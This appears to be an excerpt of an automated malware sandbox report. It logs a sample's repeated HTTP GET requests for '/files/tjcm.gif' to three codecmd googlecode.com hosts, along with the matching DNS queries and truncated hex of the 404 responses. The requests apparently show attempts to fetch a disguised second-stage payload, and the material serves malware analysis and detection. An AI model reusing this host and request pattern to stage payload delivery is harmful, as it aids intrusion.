                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: codecmd01.googlecode.com
                      Source: global trafficDNS traffic detected: DNS query: codecmd02.googlecode.com
                      Source: global trafficDNS traffic detected: DNS query: codecmd03.googlecode.com
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:13:23 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:13:25 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 